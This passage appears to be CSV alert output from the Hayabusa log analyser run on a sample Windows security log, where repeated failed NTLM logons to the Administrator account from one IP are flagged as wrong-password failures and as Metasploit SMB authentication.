SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: 
